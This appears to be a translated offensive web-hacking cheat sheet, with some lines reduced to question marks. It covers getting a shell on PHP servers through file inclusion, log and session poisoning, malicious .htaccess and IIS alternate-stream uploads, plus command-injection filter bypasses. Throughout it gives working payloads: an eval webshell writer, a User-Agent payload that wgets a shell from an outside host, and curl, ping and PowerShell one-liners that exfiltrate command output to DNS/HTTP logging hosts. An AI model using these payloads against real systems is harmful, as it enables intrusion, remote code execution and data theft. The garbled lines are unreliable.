??????????????????????????????е??ЩС??????????ο???
0x01 PHP file inclusion (LFI) to getshell
?????????????????????:???????????????????????????????????
PHP stream wrappers `php://input` and `data://`: when the included path is one of these wrappers, the raw POST body (or the data: payload) is executed as PHP. Both require `allow_url_include=On` (data:// additionally needs `allow_url_fopen=On`); allow_url_include is off by default on every supported PHP version, so check phpinfo() first.
http://example.com/test.php?url=php://input
POST: <?php fwrite(fopen("shell.php","w"),'<?php eval($_POST["pass"]);?>') ?>   (plain ASCII commas — full-width commas are a PHP syntax error)
Log file inclusion: get PHP code written into the web server's access or error log (via the request URI, User-Agent, etc.), then include the log file. The PHP process must be able to read the log file, which many distributions' default permissions prevent; a very large log can also make the include time out or exhaust memory.
Apache's default access log on RHEL/CentOS is /etc/httpd/logs/access_log (a symlink into /var/log/httpd/); Debian/Ubuntu use /var/log/apache2/access.log.
First inject the PHP code into a request that will be logged:
Method 1: edit the request in Burp Suite so that `<` and `>` are sent raw — a browser URL-encodes them, and `%3C?php` in the log is just text when the log is later included.
Method 2: send the request with curl (quote the URL, otherwise the shell treats `<` as input redirection):
curl 'http://example/shell.php?=<?php phpinfo();?>'
The PHP code is now in the log; including the log file executes it:
????http://127.0.0.1/lfi/index.php?page=/etc/httpd/logs/access_log
Including /proc/self/environ: only works when PHP runs as CGI/FastCGI, so that the request headers (HTTP_USER_AGENT, ...) are present in the PHP process's environment, and only when the web server user is allowed to read that pseudo-file (the kernel restricts /proc/<pid>/environ to the process owner, and hardened hosts deny it entirely).
Set the User-Agent header to: <?php system('wget http://eyidaima/shell.txt -O shell.php'); ?>   (use the full `<?php` tag — the short `<?` form only works when short_open_tag is enabled)
Including the session file: anything the application stores in $_SESSION (a username, a search term, ...) is written serialized into the session file, so PHP code placed in such a value is executed when the file is included. You need the session save path (phpinfo() shows session.save_path; PHP's default is /tmp) and your own session ID from the cookie; the file is then /tmp/sess_SESSIONID.
Including an uploaded file: upload a file that contains PHP code (an image with a PHP payload appended still passes most content-type checks), find its location on disk, then include it — include executes the file's PHP regardless of its extension.
0x02 Getting a shell via an uploaded .htaccess
.htaccess is Apache's per-directory configuration file; when the server's AllowOverride setting permits it (at least `FileInfo` is needed for the handler directive below), its directives apply to that directory and its subdirectories. If the upload form lets a file named .htaccess through, upload one with the following content:
# The directive is FilesMatch (not FileMatch) and it takes a regex in plain ASCII quotes;
# typographic quotes and the misspelled directive make Apache reject the file.
<FilesMatch "shell\.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
After that, a file uploaded as shell.jpg is handed to the PHP handler and executed. This requires mod_php (or an equivalent handler mapping for PHP-FPM) and an AllowOverride setting that includes FileInfo; with `AllowOverride None` the uploaded .htaccess is ignored.
0x03 Bypassing a suffix appended to an included path
Consider the following code:
<?php
// Deliberately vulnerable example: the included path is taken straight from
// user input. The appended '.html.php' suffix only restricts which file names
// resolve; it does not stop traversal, NUL truncation (old PHP) or wrapper
// tricks such as zip://, as the text below shows.
$a = $_GET['file'];
include $a.'.html.php';
?>
Null-byte truncation: appending %00 to the value (`file=xxxx%00`) cuts the path before the appended `.html.php`, so an arbitrary file is included instead of `xxxx.html.php`. This only works on PHP < 5.3.4 with magic_quotes_gpc off — later versions reject paths containing a NUL byte. The examples below use a file hello.html.php whose content is `<?php phpinfo(); ?>`.
Using the zip:// wrapper
Put hello.html.php (with the phpinfo() payload) into test.zip, upload the archive, then request:
????http://example/index.php?file=zip://test.zip%23hello
After the suffix is appended the include target is `zip://test.zip#hello.html.php`, i.e. the entry hello.html.php inside the archive, which PHP executes. The `#` has to be sent as `%23`, otherwise the client treats it as a URL fragment and never sends it; `test.zip` is the path of the uploaded archive on the server's filesystem (relative to the script's directory, or absolute). zip:// is not restricted by allow_url_include, so this works on a default configuration as long as the zip extension is loaded.
0x04 Getting a shell through an "anti-injection" module
Some sites (the file name sqlin.asp points at classic ASP) run an anti-injection filter that records the attacker's IP and the blocked request into a web-accessible script such as sqlin.asp. If that log is not encoded, a payload that survives the filter is written into the file and is then served as server-side code.
???????????????
???????????????∨≡??? ???? a (????????:ANSI->Unicode???????UNICODE2ANSI)
?????? and 1= ???????????∨≡???
Then request sqlin.asp to run the logged payload.
0x05 Upload bypass on IIS + PHP (Windows filename quirks)
?????????????P?
When PHP runs on Windows/IIS, the Win32 file-name matching layer treats some characters in a file name as equivalents:
double quote (") == dot (.);
greater-than (>) == single-character wildcard (?);
less-than (<) == wildcard (*);
????????????????????????????????????????????????????????.????P??????????????????????
Approach:
1) Use an NTFS alternate data stream (the `:jpg` / `::$DATA` suffix) to create the target file.
2) Use the `<` == `*` equivalence to write into it.
No %00 truncation is needed on IIS for this. Upload a file named, for example, `bypass.php:jpg`:
the data goes into the alternate stream named `jpg`, so what appears on disk is an empty file named bypass.php, while the upload check only sees a `.jpg` name; the stream content itself is never served as PHP.
1) Upload `bypass.php:jpg` → an empty bypass.php now exists on the server (the payload sits in the alternate stream, not in the file).
2) Upload again, changing the file name in Burp to `bypass.<<<` and putting the PHP code in the body; since `<` matches like `*`, the write goes to the existing bypass.php, which now contains the payload and is executed as PHP.
0x06 Command-injection filter bypasses
1) escapeshellcmd(): escapes the characters that could trick a shell into running a second command (&#;`|*?~<>^()[]{}$\, \x0A and \xFF; ' and " only when unpaired). It is meant to be applied to user data before it reaches exec()/system()/backticks. Because it escapes the command as a whole rather than a single argument, extra arguments can still be injected; on Windows the escape character is `^` (and `%`/`!` are escaped too), which is where the `^` / `%1a` tricks mentioned here apply. Use escapeshellarg() per argument, or proc_open() with an argument array, instead.
2) Build the command name from variables (defeats keyword filters):
run ls:
a=l;b=s;$a$b
print the contents of the file hello:
a=c;b=at;c=he;d=llo;$a$b ${c}$d
3) Space filters
Replace the space with the shell's internal field separator:
${IFS}
cat${IFS}hello
or with a redirection operator, which needs no surrounding space (`<>` opens the file read-write, so it fails on a file you cannot write — plain `cat<hello` needs only read access):
<>
cat<>hello
4) Out-of-band (OOB) exfiltration
When an injection (command, SQL, XXE, XSS, ...) returns no output in the response, push the data out over DNS or HTTP to a host you control (ceye.io / dnslog.info are public examples):
Linux:
curl xxxx.ceye.io/`whoami`
ping -c 1 `whoami`.xxxx.ceye.io
If the output contains characters that are not valid in a hostname or URL, base64 it first. Note that `base64` wraps at 76 characters and emits `+`, `/` and `=`; use `base64 -w0` on GNU coreutils for longer output, and keep DNS labels under 63 characters:
curl http://xxxx.ceye.io/$(id|base64)
Windows (the `%x` / `%i` forms below are for an interactive prompt; in a .bat file write `%%x` / `%%i`):
HTTP:
for /F %x in ('whoami') do start http://xxx.ceye.io/%x
DNS:
single-line output:   for /F "delims=" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info
output of the form DOMAIN\user (a backslash is not valid in a DNS label), so take the part after it — `delims=` must be the last option in the for /F string because it consumes everything up to the closing quote:   for /F "tokens=2 delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info
Or base64-encode the value with PowerShell and send it over HTTP:
????for /F %x in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%x'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://xxx.ceye.io/'+$a);